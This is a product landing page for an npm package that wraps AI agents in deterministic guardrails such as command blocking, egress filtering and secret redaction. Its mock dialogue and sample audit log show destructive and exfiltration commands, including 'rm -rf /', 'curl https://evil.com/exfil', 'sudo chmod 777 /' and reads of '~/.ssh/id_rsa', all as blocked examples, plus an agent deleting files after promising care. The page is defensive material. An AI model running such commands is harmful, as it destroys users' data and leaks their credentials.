CONTROL THE CHAOS. DON'T KILL IT.

The invariant layer for AI agents

"The more data & control you give to the AI agent: (A) the more it can help you AND (B) the more it can hurt you." Lex Fridman
BUNKER TACTICAL YOLO
Operational. Constraints Active.
$ npm install agentgrd [click to copy]
GitHub npm
STOP BEGGING PROMPTS  +++  START ENFORCING PHYSICS  +++  REGEX DOESN'T HALLUCINATE  +++  CODE IS LAW  +++   STOP BEGGING PROMPTS  +++  START ENFORCING PHYSICS  +++  REGEX DOESN'T HALLUCINATE  +++  CODE IS LAW  +++  

THE PROBLEM IS OBVIOUS

Your agent has root access to your machine. Your security layer is a system prompt that says "please be careful." Think about that for a second.

THE WEAK WAY

User: "Please don't delete my files..."

Agent: "I understand. I'll be careful."

Agent: rm -rf /

THE AGENTGUARD WAY

Agent attempted: rm -rf /*

[ BLOCKED BY COMMAND_GUARD ]

Topology constraint violated. Action nullified.

THE ARSENAL

Eight modules. Zero LLMs in the loop. Each one a deterministic constraint that cannot be talked out of its job.

[ FS_GUARD ]

Filesystem topology lock. The agent lives in a box. ~/.ssh, ~/.aws, /etc — physically unreachable.

[ COMMAND_GUARD ]

Shell pattern blocker. sudo, rm -rf, pipe chains. Dead on arrival.

[ EGRESS_GUARD ]

Outbound network filter. Allowlist by domain, IP, port. No data leaves the gravity well.

[ OUTPUT_DLP ]

Secret sanitizer. AWS keys, tokens, private certs — redacted before they hit the screen.

[ RATE_BUDGET ]

Execution throttle. Runaway loops stopped cold. Counts calls, not prayers.

[ SKILL_SCANNER ]

Injection detector. Zero-width chars, base64 payloads, exfil URLs. Caught at load time.

[ APPROVAL_GATE ]

Human-in-the-loop. One-tap Telegram approval for risky ops. You stay in control from your phone.

[ AUDIT ]

Append-only decision log. Every action. Every timestamp. No gaps. No edits.

THREE POSTURES

One config change. Pick the containment level that matches your context.

BUNKER

Zero Trust. Total Stasis.

Production, billing, access keys. Default deny. Sandbox required. 30 calls/min.

TACTICAL

Trust but Verify.

Development, staging, daily work. Default deny. Secrets redacted. 60 calls/min.

YOLO

Safety Off. Logging Only.

Research, brainstorming. Observe mode. Logs everything, blocks nothing. 120 calls/min.

GET RUNNING

terminal
$ npm install agentgrd
$ npx agentgrd init --framework openclaw --profile tactical
$ npx agentgrd doctor # verify setup
$ npx agentgrd pentest # test your defenses
audit stream
[10:49:01] WARN Agent tried ~/.ssh/id_rsa → REDACTED
[10:49:02] INFO Tool call 'calculator' → ALLOWED
[10:49:03] DENY rm -rf /* → BLOCKED BY COMMAND_GUARD
[10:49:04] INFO Tool call 'web_search' → ALLOWED
[10:49:05] WARN Output contained AKIA*** → REDACTED
[10:49:06] DENY curl https://evil.com/exfil → BLOCKED BY EGRESS_GUARD
[10:49:07] INFO Tool call 'read_file' → ALLOWED
[10:49:08] DENY sudo chmod 777 / → BLOCKED BY COMMAND_GUARD
[10:49:01] WARN Agent tried ~/.ssh/id_rsa → REDACTED
[10:49:02] INFO Tool call 'calculator' → ALLOWED
[10:49:03] DENY rm -rf /* → BLOCKED BY COMMAND_GUARD
[10:49:04] INFO Tool call 'web_search' → ALLOWED
[10:49:05] WARN Output contained AKIA*** → REDACTED
[10:49:06] DENY curl https://evil.com/exfil → BLOCKED BY EGRESS_GUARD
[10:49:07] INFO Tool call 'read_file' → ALLOWED
[10:49:08] DENY sudo chmod 777 / → BLOCKED BY COMMAND_GUARD